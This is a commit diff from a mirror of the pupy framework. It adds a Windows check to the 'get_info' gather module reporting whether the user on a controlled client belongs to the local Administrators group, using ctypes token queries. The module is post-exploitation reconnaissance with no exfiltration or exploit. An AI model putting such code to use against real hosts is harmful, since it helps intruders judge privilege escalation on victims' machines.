mirror of https://github.com/n1nj4sec/pupy.git
Shows if user is in local admin grp in get_info module
This commit is contained in:
quentinhardy
parent
6dd52fbbe7
commit
df59c0e101
|
|
@ -6,6 +6,7 @@ __class_name__="GetInfo"
|
|||
@config(cat="gather")
|
||||
class GetInfo(PupyModule):
|
||||
""" get some informations about one or multiple clients """
|
||||
dependencies=["psutil", "pupwinutils.security"]
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__)
|
||||
#self.arg_parser.add_argument('arguments', nargs='+', metavar='<command>')
|
||||
|
|
@ -21,6 +22,14 @@ class GetInfo(PupyModule):
|
|||
if self.client.is_windows():
|
||||
for k in windKeys:
|
||||
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
||||
currentUserIsLocalAdmin = self.client.conn.modules["pupwinutils.security"].can_get_admin_access()
|
||||
desc = "local_adm"
|
||||
if currentUserIsLocalAdmin == True:
|
||||
infos+="{:<10}: {}\n".format(desc,"Yes")
|
||||
elif currentUserIsLocalAdmin == False:
|
||||
infos+="{:<10}: {}\n".format(desc,"No")
|
||||
else:
|
||||
infos+="{:<10}: {}\n".format(desc,"?")
|
||||
elif self.client.is_linux():
|
||||
for k in linuxKeys:
|
||||
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
||||
|
|
|
|||
|
|
@ -473,3 +473,62 @@ def get_currents_privs():
|
|||
privileges = ctypes.cast(buffer, ctypes.POINTER(TOKEN_PRIVS)).contents
|
||||
return privileges
|
||||
|
||||
def can_get_admin_access():
|
||||
"""
|
||||
Check if the user may be able to get administrator access.
|
||||
Returns True if the user is in the administrator's group.
|
||||
Otherwise returns False
|
||||
"""
|
||||
SECURITY_MAX_SID_SIZE = 68
|
||||
WinBuiltinAdministratorsSid = 26
|
||||
ERROR_NO_SUCH_LOGON_SESSION = 1312
|
||||
ERROR_PRIVILEGE_NOT_HELD = 1314
|
||||
TokenLinkedToken = 19
|
||||
# On XP or lower this is equivalent to has_root()
|
||||
if sys.getwindowsversion()[0] < 6:
|
||||
return bool(ctypes.windll.shell32.IsUserAnAdmin())
|
||||
# On Vista or higher, there's the whole UAC token-splitting thing.
|
||||
# Many thanks for Junfeng Zhang for the workflow: htttp://blogs.msdn.com/junfeng/archive/2007/01/26/how-to-tell-if-the-current-user-is-in-administrators-group-programmatically.aspx
|
||||
proc = ctypes.windll.kernel32.GetCurrentProcess()
|
||||
# Get the token for the current process.
|
||||
try:
|
||||
token = ctypes.wintypes.HANDLE()
|
||||
ctypes.windll.advapi32.OpenProcessToken(proc,TOKEN_QUERY,byref(token))
|
||||
try:
|
||||
# Get the administrators SID.
|
||||
sid = ctypes.create_string_buffer(SECURITY_MAX_SID_SIZE)
|
||||
sz = ctypes.wintypes.DWORD(SECURITY_MAX_SID_SIZE)
|
||||
target_sid = WinBuiltinAdministratorsSid
|
||||
ctypes.windll.advapi32.CreateWellKnownSid(target_sid,None,byref(sid),byref(sz))
|
||||
# Check whether the token has that SID directly.
|
||||
has_admin = ctypes.wintypes.BOOL()
|
||||
ctypes.windll.advapi32.CheckTokenMembership(None,byref(sid),byref(has_admin))
|
||||
if has_admin.value:
|
||||
return True
|
||||
# Get the linked token. Failure may mean no linked token.
|
||||
lToken = ctypes.wintypes.HANDLE()
|
||||
try:
|
||||
cls = TokenLinkedToken
|
||||
ctypes.windll.advapi32.GetTokenInformation(token,cls,byref(lToken),sizeof(lToken),byref(sz))
|
||||
except WindowsError, e:
|
||||
if e.winerror == ERROR_NO_SUCH_LOGON_SESSION:
|
||||
return False
|
||||
elif e.winerror == ERROR_PRIVILEGE_NOT_HELD:
|
||||
return False
|
||||
else:
|
||||
raise
|
||||
# Check if the linked token has the admin SID
|
||||
try:
|
||||
ctypes.windll.advapi32.CheckTokenMembership(lToken,byref(sid),byref(has_admin))
|
||||
return bool(has_admin.value)
|
||||
finally:
|
||||
ctypes.windll.kernel32.CloseHandle(lToken)
|
||||
finally:
|
||||
ctypes.windll.kernel32.CloseHandle(token)
|
||||
except Exception,e:
|
||||
return None
|
||||
finally:
|
||||
try:
|
||||
ctypes.windll.kernel32.CloseHandle(proc)
|
||||
except Exception,e:
|
||||
pass
|
||||
|
|
|
|||
Loading…
Reference in New Issue